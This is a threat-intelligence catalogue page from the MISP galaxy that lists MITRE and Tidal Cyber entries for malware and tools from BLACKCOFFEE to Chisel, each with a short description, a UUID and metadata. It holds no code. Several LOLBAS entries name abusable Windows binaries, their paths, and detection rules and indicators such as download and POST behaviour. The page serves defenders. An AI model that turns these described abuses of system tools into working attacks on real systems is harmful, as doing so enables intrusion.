UUID e85e2fca-9347-4448-bfc1-342f29d5d6a1 which can be used as unique global reference for BLACKCOFFEE in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0069 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
BlackEnergy
BlackEnergy is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. [F-Secure BlackEnergy 2014]
Internal MISP references
UUID 908216c7-3ad4-4e0c-9dd3-a7ed5d1c695f which can be used as unique global reference for BlackEnergy in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0089 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
BlackMould
BlackMould is a web shell based on China Chopper for servers running Microsoft IIS. First reported in December 2019, it has been used in malicious campaigns by GALLIUM against telecommunication providers.[Microsoft GALLIUM December 2019]
Internal MISP references
UUID da348a51-d047-4144-9ba4-34d2ce964a11 which can be used as unique global reference for BlackMould in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0564 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
BLINDINGCAN
BLINDINGCAN is a remote access Trojan that has been used by the North Korean government since at least early 2020 in cyber operations against defense, engineering, and government organizations in Western Europe and the US.[US-CERT BLINDINGCAN Aug 2020][NHS UK BLINDINGCAN Aug 2020]
Internal MISP references
UUID 1af8ea81-40df-4fba-8d63-1858b8b31217 which can be used as unique global reference for BLINDINGCAN in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0520 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
BloodHound
BloodHound is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.[GitHub Bloodhound][CrowdStrike BloodHound April 2018][FoxIT Wocao December 2019]
Internal MISP references
UUID 72658763-8077-451e-8572-38858f8cacf3 which can be used as unique global reference for BloodHound in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0521 |
| source | MITRE |
| tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
BLUELIGHT
BLUELIGHT is a remote access Trojan used by APT37 that was first observed in early 2021.[Volexity InkySquid BLUELIGHT August 2021]
Internal MISP references
UUID 3aaaaf86-638b-4a65-be18-c6e6dcdcdb97 which can be used as unique global reference for BLUELIGHT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0657 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Bonadan
Bonadan is a malicious version of OpenSSH which acts as a custom backdoor. Bonadan has been active since at least 2018 and combines a new cryptocurrency-mining module with the same credential-stealing module used by the Onderon family of backdoors.[ESET ForSSHe December 2018]
Internal MISP references
UUID 3793db4b-f843-4cfd-89d2-ec28b62feda5 which can be used as unique global reference for Bonadan in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux'] |
| software_attack_id | S0486 |
| source | MITRE |
| type | ['malware'] |
BONDUPDATER
BONDUPDATER is a PowerShell backdoor used by OilRig. It was first observed in November 2017 during targeting of a Middle Eastern government organization, and an updated version was observed in August 2018 being used to target a government organization with spearphishing emails.[FireEye APT34 Dec 2017][Palo Alto OilRig Sep 2018]
Internal MISP references
UUID d8690218-5272-47d8-8189-35d3b518e66f which can be used as unique global reference for BONDUPDATER in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0360 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
BoomBox
BoomBox is a downloader responsible for executing next stage components that has been used by APT29 since at least 2021.[MSTIC Nobelium Toolset May 2021]
Internal MISP references
UUID 9d393f6f-855e-4348-8a26-008174e3605a which can be used as unique global reference for BoomBox in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0635 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
BOOSTWRITE
BOOSTWRITE is a loader crafted to be launched via abuse of the DLL search order of applications used by FIN7.[FireEye FIN7 Oct 2019]
Internal MISP references
UUID 74a73624-d53b-4c84-a14b-8ae964fd577c which can be used as unique global reference for BOOSTWRITE in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0415 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
BOOTRASH
BOOTRASH is a Bootkit that targets Windows operating systems. It has been used by threat actors that target the financial sector.[Mandiant M Trends 2016][FireEye Bootkits][FireEye BOOTRASH SANS]
Internal MISP references
UUID d47a4753-80f5-494e-aad7-d033aaff0d6d which can be used as unique global reference for BOOTRASH in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0114 |
| source | MITRE |
| type | ['malware'] |
BoxCaon
BoxCaon is a Windows backdoor that was used by IndigoZebra in a 2021 spearphishing campaign against Afghan government officials. BoxCaon's name stems from similarities shared with the malware family xCaon.[Checkpoint IndigoZebra July 2021]
Internal MISP references
UUID d3e46011-3433-426c-83b3-61c2576d5f71 which can be used as unique global reference for BoxCaon in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0651 |
| source | MITRE |
| tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Brave Prince
Brave Prince is a Korean-language implant that was first observed in the wild in December 2017. It contains similar code and behavior to Gold Dragon, and was seen along with Gold Dragon and RunningRAT in operations surrounding the 2018 Pyeongchang Winter Olympics. [McAfee Gold Dragon]
Internal MISP references
UUID 51b27e2c-c737-4006-a657-195ea1a1f4f0 which can be used as unique global reference for Brave Prince in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0252 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Briba
Briba is a trojan used by Elderwood to open a backdoor and download files on to compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Briba May 2012]
Internal MISP references
UUID 7942783c-73a7-413c-94d1-8981029a1c51 which can be used as unique global reference for Briba in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0204 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Brute Ratel C4
Brute Ratel C4 is a commercial red-teaming and adversarial attack simulation tool that first appeared in December 2020. Brute Ratel C4 was specifically designed to avoid detection by endpoint detection and response (EDR) and antivirus (AV) capabilities, and deploys agents called badgers to enable arbitrary command execution for lateral movement, privilege escalation, and persistence. In September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.[Dark Vortex Brute Ratel C4][Palo Alto Brute Ratel July 2022][MDSec Brute Ratel August 2022][SANS Brute Ratel October 2022][Trend Micro Black Basta October 2022]
Internal MISP references
UUID 23043b44-69a6-5cdf-8f60-5a68068680c7 which can be used as unique global reference for Brute Ratel C4 in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1063 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
BS2005
BS2005 is malware that was used by Ke3chang in spearphishing campaigns since at least 2011. [Mandiant Operation Ke3chang November 2014]
Internal MISP references
UUID c9e773de-0213-4b64-83fb-637060c8b5ed which can be used as unique global reference for BS2005 in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0014 |
| source | MITRE |
| type | ['malware'] |
BUBBLEWRAP
BUBBLEWRAP is a full-featured, second-stage backdoor used by the admin@338 group. It is set to run when the system boots and includes functionality to check, upload, and register plug-ins that can further enhance its capabilities. [FireEye admin@338]
Internal MISP references
UUID 2be4e3d2-e8c5-4406-8041-2c17bdb3a547 which can be used as unique global reference for BUBBLEWRAP in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0043 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
build_downer
build_downer is a downloader that has been used by BRONZE BUTLER since at least 2019.[Trend Micro Tick November 2019]
Internal MISP references
UUID c21d3e6c-0f6d-44a8-bdd5-5b3180a641c9 which can be used as unique global reference for build_downer in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0471 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Bumblebee
Bumblebee is a custom loader written in C++ that has been used by multiple threat actors, including possible initial access brokers, to download and execute additional payloads since at least March 2022. Bumblebee has been linked to ransomware operations including Conti, Quantum, and Mountlocker and derived its name from the appearance of "bumblebee" in the user-agent.[Google EXOTIC LILY March 2022][Proofpoint Bumblebee April 2022][Symantec Bumblebee June 2022]
Internal MISP references
UUID cc155181-fb34-4aaf-b083-b7b57b140b7a which can be used as unique global reference for Bumblebee in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1039 |
| source | MITRE |
| tags | ['aa983c81-e54b-49b3-b0dd-53cf950825b8', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Bundlore
Bundlore is adware written for macOS that has been in use since at least 2015. Though categorized as adware, Bundlore has many features associated with more traditional backdoors.[MacKeeper Bundlore Apr 2019]
Internal MISP references
UUID e9873bf1-9619-4c62-b4cf-1009e83de186 which can be used as unique global reference for Bundlore in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS'] |
| software_attack_id | S0482 |
| source | MITRE |
| tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
| type | ['malware'] |
Cachedump
Cachedump is a publicly-available tool that program extracts cached password hashes from a system’s registry. [Mandiant APT1]
Internal MISP references
UUID 7c03fb92-3cd8-4ce4-a1e0-75e47465e4bc which can be used as unique global reference for Cachedump in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0119 |
| source | MITRE |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
CaddyWiper
CaddyWiper is a destructive data wiper that has been used in attacks against organizations in Ukraine since at least March 2022.[ESET CaddyWiper March 2022][Cisco CaddyWiper March 2022]
Internal MISP references
UUID 62d0ddcd-790d-4d2d-9d94-276f54b40cf0 which can be used as unique global reference for CaddyWiper in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0693 |
| source | MITRE |
| tags | ['2e621fc5-dea4-4cb9-987e-305845986cd3'] |
| type | ['malware'] |
Cadelspy
Cadelspy is a backdoor that has been used by APT39.[Symantec Chafer Dec 2015]
Internal MISP references
UUID c8a51b39-6906-4381-9bb4-4e9e612aa085 which can be used as unique global reference for Cadelspy in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0454 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
CALENDAR
CALENDAR is malware used by APT1 that mimics legitimate Gmail Calendar traffic. [Mandiant APT1]
Internal MISP references
UUID ad859a79-c183-44f6-a89a-f734710672a9 which can be used as unique global reference for CALENDAR in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0025 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Calisto
Calisto is a macOS Trojan that opens a backdoor on the compromised machine. Calisto is believed to have first been developed in 2016. [Securelist Calisto July 2018] [Symantec Calisto July 2018]
Internal MISP references
UUID 6b5b408c-4f9d-4137-bfb1-830d12e9736c which can be used as unique global reference for Calisto in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS'] |
| software_attack_id | S0274 |
| source | MITRE |
| type | ['malware'] |
CallMe
CallMe is a Trojan designed to run on Apple OSX. It is based on a publicly available tool called Tiny SHell. [Scarlet Mimic Jan 2016]
Internal MISP references
UUID 352ee271-89e6-4d3f-9c26-98dbab0e2986 which can be used as unique global reference for CallMe in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS'] |
| software_attack_id | S0077 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Cannon
Cannon is a Trojan with variants written in C# and Delphi. It was first observed in April 2018. [Unit42 Cannon Nov 2018][Unit42 Sofacy Dec 2018]
Internal MISP references
UUID 790e931d-2571-496d-9f48-322774a7d482 which can be used as unique global reference for Cannon in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0351 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Carbanak
Carbanak is a full-featured, remote backdoor used by a group of the same name (Carbanak). It is intended for espionage, data exfiltration, and providing remote access to infected machines. [Kaspersky Carbanak] [FireEye CARBANAK June 2017]
Internal MISP references
UUID 4cb9294b-9e4c-41b9-b640-46213a01952d which can be used as unique global reference for Carbanak in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0030 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Carberp
Carberp is a credential and information stealing malware that has been active since at least 2009. Carberp's source code was leaked online in 2013, and subsequently used as the foundation for the Carbanak backdoor.[Trend Micro Carberp February 2014][KasperskyCarbanak][RSA Carbanak November 2017]
Internal MISP references
UUID df9491fd-5e24-4548-8e21-1268dce59d1f which can be used as unique global reference for Carberp in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0484 |
| source | MITRE |
| type | ['malware'] |
Carbon
Carbon is a sophisticated, second-stage backdoor and framework that can be used to steal sensitive information from victims. Carbon has been selectively used by Turla to target government and foreign affairs-related organizations in Central Asia.[ESET Carbon Mar 2017][Securelist Turla Oct 2018]
Internal MISP references
UUID 61f5d19c-1da2-43d1-ab20-51eacbca71f2 which can be used as unique global reference for Carbon in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0335 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Cardinal RAT
Cardinal RAT is a potentially low volume remote access trojan (RAT) observed since December 2015. Cardinal RAT is notable for its unique utilization of uncompiled C# source code and the Microsoft Windows built-in csc.exe compiler.[PaloAlto CardinalRat Apr 2017]
Internal MISP references
UUID fa23acef-3034-43ee-9610-4fc322f0d80b which can be used as unique global reference for Cardinal RAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0348 |
| source | MITRE |
| tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
| type | ['malware'] |
CARROTBALL
CARROTBALL is an FTP downloader utility that has been in use since at least 2019. CARROTBALL has been used as a downloader to install SYSCON.[Unit 42 CARROTBAT January 2020]
Internal MISP references
UUID 84bb4068-b441-435e-8535-02a458ffd50b which can be used as unique global reference for CARROTBALL in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0465 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['tool'] |
CARROTBAT
CARROTBAT is a customized dropper that has been in use since at least 2017. CARROTBAT has been used to install SYSCON and has infrastructure overlap with KONNI.[Unit 42 CARROTBAT November 2018][Unit 42 CARROTBAT January 2020]
Internal MISP references
UUID aefa893d-fc6e-41a9-8794-2700049db9e5 which can be used as unique global reference for CARROTBAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0462 |
| source | MITRE |
| type | ['malware'] |
Catchamas
Catchamas is a Windows Trojan that steals information from compromised systems. [Symantec Catchamas April 2018]
Internal MISP references
UUID 04deccb5-9850-45c3-a900-5d7039a94190 which can be used as unique global reference for Catchamas in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0261 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Caterpillar WebShell
Caterpillar WebShell is a self-developed Web Shell tool created by the group Volatile Cedar.[ClearSky Lebanese Cedar Jan 2021]
Internal MISP references
UUID ee88afaa-88bc-4c20-906f-332866388549 which can be used as unique global reference for Caterpillar WebShell in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0572 |
| source | MITRE |
| tags | ['311abf64-a9cc-4c6a-b778-32c5df5658be'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
CC-Attack
CC-Attack is a publicly available script that automates the use of open, external proxy servers as part of denial of service flood attacks. Its use has been promoted among the members of the Killnet hacktivist collective.[Flashpoint Glossary Killnet]
Internal MISP references
UUID 7664bfa5-8477-4903-9103-1144113fca36 which can be used as unique global reference for CC-Attack in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Linux', 'Windows'] |
| software_attack_id | S5062 |
| source | Tidal Cyber |
| tags | ['62bde669-3020-4682-be68-36c83b2588a4'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
CCBkdr
CCBkdr is malware that was injected into a signed version of CCleaner and distributed from CCleaner's distribution website. [Talos CCleanup 2017] [Intezer Aurora Sept 2017]
Internal MISP references
UUID 4eb0720c-7046-4ff1-adfd-ae603506e499 which can be used as unique global reference for CCBkdr in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0222 |
| source | MITRE |
| tags | ['f2ae2283-f94d-4f8f-bbde-43f2bed66c55'] |
| type | ['malware'] |
ccf32
ccf32 is data collection malware that has been used since at least February 2019, most notably during the FunnyDream campaign; there is also a similar x64 version.[Bitdefender FunnyDream Campaign November 2020]
Internal MISP references
UUID e00c2a0c-bbe5-4eff-b0ad-b2543456a317 which can be used as unique global reference for ccf32 in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1043 |
| source | MITRE |
| type | ['malware'] |
Cdb
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Debugging tool included with Windows Debugging Tools.
Author: Oddvar Moe
Paths: * C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe * C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
Resources: * http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html * https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options * https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda * https://mrd0x.com/the-power-of-cdb-debugging-tool/ * https://twitter.com/nas_bench/status/1534957360032120833
Detection: * Sigma: proc_creation_win_lolbin_cdb.yml * Elastic: defense_evasion_unusual_process_network_connection.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules[Cdb.exe - LOLBAS Project]
Internal MISP references
UUID d9ea2696-7c47-44cd-8784-9aeef5e149ea which can be used as unique global reference for Cdb in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5208 |
| source | Tidal Cyber |
| tags | ['4479b9e9-d912-451a-9ad5-08b3d922422d', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
CertOC
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used for installing certificates
Author: Ensar Samil
Paths: * c:\windows\system32\certoc.exe * c:\windows\syswow64\certoc.exe
Resources: * https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 * https://twitter.com/sblmsrsn/status/1452941226198671363?s=20
Detection: * Sigma: proc_creation_win_certoc_load_dll.yml * IOC: Process creation with given parameter * IOC: Unsigned DLL load via certoc.exe * IOC: Network connection via certoc.exe[CertOC.exe - LOLBAS Project]
Internal MISP references
UUID 34e1c197-ac43-4634-9a0d-9148c748f774 which can be used as unique global reference for CertOC in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5087 |
| source | Tidal Cyber |
| tags | ['fb909648-ee44-4871-abe6-82c909c4d677', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
CertReq
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used for requesting and managing certificates
Author: David Middlehurst
Paths: * C:\Windows\System32\certreq.exe * C:\Windows\SysWOW64\certreq.exe
Resources: * https://dtm.uk/certreq
Detection: * Sigma: proc_creation_win_lolbin_susp_certreq_download.yml * IOC: certreq creates new files * IOC: certreq makes POST requests[CertReq.exe - LOLBAS Project]
Internal MISP references
UUID 43050f80-ce28-49e3-aac6-cb3f4a07f4b4 which can be used as unique global reference for CertReq in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5088 |
| source | Tidal Cyber |
| tags | ['35a798a2-eaab-48a3-9ee7-5538f36a4172', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
certutil
certutil is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services. [TechNet Certutil]
Internal MISP references
UUID 2fe21578-ee31-4ee8-b6ab-b5f76f97d043 which can be used as unique global reference for certutil in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0160 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '412da5b4-fb41-40fc-a29a-78dc9119aa75', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Chaes
Chaes is a multistage information stealer written in several programming languages that collects login credentials, credit card numbers, and other financial information. Chaes was first observed in 2020, and appears to primarily target victims in Brazil as well as other e-commerce customers in Latin America.[Cybereason Chaes Nov 2020]
Internal MISP references
UUID 0c8efcd0-bfdf-4771-8754-18aac836c359 which can be used as unique global reference for Chaes in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0631 |
| source | MITRE |
| tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
| type | ['malware'] |
Chaos
Chaos is Linux malware that compromises systems by brute force attacks against SSH services. Once installed, it provides a reverse shell to its controllers, triggered by unsolicited packets. [Chaos Stolen Backdoor]
Internal MISP references
UUID 92c88765-6b12-42cd-b1d7-f6a65b2236e2 which can be used as unique global reference for Chaos in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux'] |
| software_attack_id | S0220 |
| source | MITRE |
| tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
CharmPower
CharmPower is a PowerShell-based, modular backdoor that has been used by Magic Hound since at least 2022.[Check Point APT35 CharmPower January 2022]
Internal MISP references
UUID b1e3b56f-2e83-4cab-a1c1-16999009d056 which can be used as unique global reference for CharmPower in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0674 |
| source | MITRE |
| tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
ChChes
ChChes is a Trojan that appears to be used exclusively by menuPass. It was used to target Japanese organizations in 2016. Its lack of persistence methods suggests it may be intended as a first-stage tool. [Palo Alto menuPass Feb 2017] [JPCERT ChChes Feb 2017] [PWC Cloud Hopper Technical Annex April 2017]
Internal MISP references
UUID 3f2283ef-67c2-49a3-98ac-1aa9f0499361 which can be used as unique global reference for ChChes in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0144 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Cherry Picker
Cherry Picker is a point of sale (PoS) memory scraper. [Trustwave Cherry Picker]
Internal MISP references
UUID 2fd6f564-918e-4ee7-920a-2b4be858d11a which can be used as unique global reference for Cherry Picker in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0107 |
| source | MITRE |
| type | ['malware'] |
China Chopper
China Chopper is a Web Shell hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server.[Lee 2013] It has been used by several threat groups.[Dell TG-3390][FireEye Periscope March 2018][CISA AA21-200A APT40 July 2021][Rapid7 HAFNIUM Mar 2021]
Internal MISP references
UUID 723c5ab7-23ca-46f2-83bb-f1d1e550122c which can be used as unique global reference for China Chopper in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0020 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '311abf64-a9cc-4c6a-b778-32c5df5658be'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Chinoxy
Chinoxy is a backdoor that has been used since at least November 2018, during the FunnyDream campaign, to gain persistence and drop additional payloads. According to security researchers, Chinoxy has been used by Chinese-speaking threat actors.[Bitdefender FunnyDream Campaign November 2020]
Internal MISP references
UUID 7c36563a-9143-4766-8aef-4e1787e18d8c which can be used as unique global reference for Chinoxy in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1041 |
| source | MITRE |
| type | ['malware'] |
Chisel
Chisel is an open source tool that can be used for networking tunneling.[U.S. CISA AvosLocker October 11 2023] According to its GitHub project page, "Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH".[GitHub Chisel] Threat actors including ransomware operators and nation-state-aligned espionage actors have used Chisel as part of their operations.[U.S. CISA AvosLocker October 11 2023][CISA AA20-259A Iran-Based Actor September 2020]
Internal MISP references
